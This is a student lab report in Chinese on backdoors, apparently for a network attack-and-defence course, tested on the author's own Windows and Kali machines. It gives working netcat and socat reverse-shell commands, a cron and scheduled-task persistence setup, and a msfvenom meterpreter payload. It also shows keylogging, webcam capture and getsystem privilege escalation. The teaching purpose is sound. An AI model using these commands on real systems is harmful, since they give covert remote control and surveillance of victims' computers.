2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165210

实验内容:

  1. 使用netcat获取主机操作Shell,cron启动。
  2. 使用Socat获取主机操作Shell,任务计划启动
  3. 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
  4. 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
  5. 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问题回答:

1.例举你能想到的一个后门进入到你系统中的可能方式?

  • 你下载文件和软件时,可能就把后门带来进来
  • 一些可移动设备,比如U盘硬盘什么的,我记得我曾在网上看过就是U盘进入后再次启动电脑会留有后门,这个后门就会自动下载垃圾软件不会被察觉
  • 访问一些病毒网站,虽然退出了网页,但是有可能还留有后门

2.例举你知道的后门如何启动起来(win及linux)的方式?

  • linux中可以通过cron来定时启动
  • win中可能会通过病毒来启动后门
  • 添加启动项,修改默认的Shell程序,添加用户的初始化程序,添加应用程序初始化动态链接库,添加到启动组
  • 安装自己的服务和驱动程序,修改原有的服务和驱动的配置,替换原有的服务和驱动的程序文件,感染原有的服务和驱动的程序文件

3.Meterpreter有哪些给你映像深刻的功能?

  • 简直太nb了,很有趣,留下后门,可以录音,可以录像,这简直就是黑客呀,真的太强了,但同时觉得自己的电脑不是很安全,会被人监听。

4.如何发现自己有系统有没有被安装后门?

杀毒软件防火墙,会自动杀掉,就像实验中的20165210.exe文件,我一开始没关那个防火墙,一放到主机就被杀掉了。

实验过程:

准备工作:

打开win10主机,kali虚拟机,分别输入ipconfig和ifconfig得到两个机子的IP地址(192.168.199.208、192.168.16.132)

关闭杀毒软件和防火墙(很重要!!!!)

然后两个机子都要有netcat和socat文件

双方互相获取对方的Shell

首先是Windows:先进入cmd,在netcat文件下输入命令

ncat.exe -l -p 5210

开启监听,5210为监听端口号

另一端在命令行输入

nc 192.168.199.208 5210 -e /bin/sh

反弹连接,此时Windows获得了linux Shell如图

接下来是Linux:操作类似,先在虚拟机命令行上输入

nc -l -p 5210

Windows反弹连接,在命令行输入指令

ncat.exe -e cmd.exe 192.168.16.132 5210

这样Linux就获得了Windows的控制权如图

使用netcat传输数据

在Windows的命令行输入命令

ncat.exe -l 5210

对5210端口进行监听,在Linux命令行里输入

ncat 192.168.199.208 5210

连接到5210端口,并传输一些数据,然后就可以在Windows中看到传输的数据了如图

cron启动

在Windows下,命令行输入ncat.exe -i -p 5210,监听5210端口

在Linux下,输入

crontab -e

打开crontab,然后选择第三个,i编辑,在最后一行加上

06 * * * /bin/netcat 192.168.199.208 5210 -e /bin/sh

我当时的时间是04所以我选了06,就是在每小时的06分运行此命令如图

到06分后就可以看到已经获取了Linux的Shell如图

使用Socat获取主机操作Shell,任务计划启动

打开Windows的计算机管理任务,点击任务计划程序,创建任务如图

新建触发器,选择工作站锁定所有用户如图

在操作中,将选择程序脚本路径,参数一栏填

tcp-listen:5210 exec:cmd.exe,pty,stderr

完成创建右键点击运行,然后在kali里输入

socat - tcp:192.168.199.208:5210

获取Windows的Shell如图

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

首先先生成一个后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5325 -f exe > 20165210.exe

将生成的文件放到Windows(我直接拖到了Windows桌面)然后kali这面直接输入命令msfconsole启动。如图

进入了msf控制台,输入

use exploit/multi/handler

启用监听,然后输入

set payload windows/meterpreter/reverse_tcp

设置payload,然后输入

set LHOST 192.168.16.132

最后输入

set LPORT 5210

设置端口号,然后exploit开始监听

在Windows中运行后门

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

获取目标主机的音频和获取目标主机的摄像头如图

还有一些比如通过命令

keyscan_start

记录下击键的过程

keyscan_dump

读取击键的记录等

还可以使用

getuid

查看当前用户,使用

getsystem

进行提权

实验中的问题、体会和收获

  1. 一开始没有关闭防火墙导致20165210.exe后门文件一出来就被杀掉了
  2. 在做使用socat获取主机操作Shell任务计划启动时,创建的任务运行不了,一直是在准备就绪中,一开始以为可能在kali里输入命令可能它就跳转运行了,但是并没有成功,然后去向大佬请教,然后就是重启了计算机发现就可以运行了
  3. 就是在启动msfconsole之后,在输入set LHOST时输入了Windows的ip地址,后来改正了才知道LHOST就是local host攻击方的IP地址,后来一想其实很好理解,反弹Shell嘛,就是建立反弹连接的,当然是反弹到攻击机了。
  4. 这个第二次实验真的十分有趣,尤其是做到第四个内容,然后我又在网上找到了一篇博客,里面有Meterpreter指令详解有时间可以看一下学艺多一些的指令感觉很好玩
  5. 有个问题就是meterpreter在获取shell之后,如何持续控制目标主机,就是在目标主机重启或下次开机后能自动连接到攻击机上。

2018-2019-2 《网络对抗技术》Exp2 后门原理与应用 20165210的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. 负载均衡技术在CDN中发挥着重要作用

    转载地址:http://www.qicaispace.com/gonggao/server/page01/info07.asp CDN是一个经策略性部署的整体系统,能够帮助用户解决分布式存储.负载均衡 ...

  2. Java-性能调优实战(jps、jstack)

    找最耗CPU的线程 1. 找出java进程 [ ~]# jps 9939 Resin 9874 WatchdogManager 9926 Jps 2. 找java进程下所有的线程 [ ~]# top ...

  3. 20145313张雪纯 《Java程序设计》8周学习总结

    20145313张雪纯 <Java程序设计>8周学习总结 教材学习内容总结 java.util.logging包的优点在于提供了日志功能相关类与接口,不必额外配置日志组件就可以在标准jav ...

  4. Bag类的接口的实现与测试(课上测试补做)

    Bag类的接口的实现与测试(课上测试补做) 截图 由于截图有一定的的限制就没有吧所有的代码截进去,后面有代码. 代码 package ClassTest; import java.util.Objec ...

  5. MysQL使用一与Python交互

    与python交互 在熟练使用sql语句的基础上,开始使用python语言提供的模块与mysql进行交互 这是我们在工作中大事要做的事 先学会sql是基础,一定要熟练编写sql语句 安装引入模块 安装 ...

  6. MysQL使用一高级应用(上)

    简介 实体与实体之间有3种对应关系,这些关系也需要存储下来 在开发中需要对存储的数据进行一些处理,用到内置的一些函数 视图用于完成查询语句的封装 事务可以保证复杂的增删改操作有效 关系 创建成绩表sc ...

  7. 从0开始 数据结构 字典树 hdu1251

    字典树 知识补充 '\0'和'\n'的区别 '\0' 是一个字符串的结尾 '\n' 是换行符 gets 和 scanf 的区别 gets()函数总结: gets() 从标准输入设备读取字符串,以回车结 ...

  8. 源码安装git

    1.安装依赖包 yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel 2.下载git源码并解压缩 wget ...

  9. HDU 3594 Cactus(仙人掌问题)

    http://acm.hdu.edu.cn/showproblem.php?pid=3594 题意: 一个有向图,判断是否强连通和每条边只在一个环中. 思路: 仙人掌问题. 用Tarjan算法判断强连 ...

  10. [WCF安全3]使用wsHttpBinding构建基于SSL与UserName授权的WCF应用程序

    上一篇文章中介绍了如何使用wsHttpBinding构建UserName授权的WCF应用程序,本文将为您介绍如何使用wsHttpBinding构建基于SSL的UserName安全授权的WCF应用程序. ...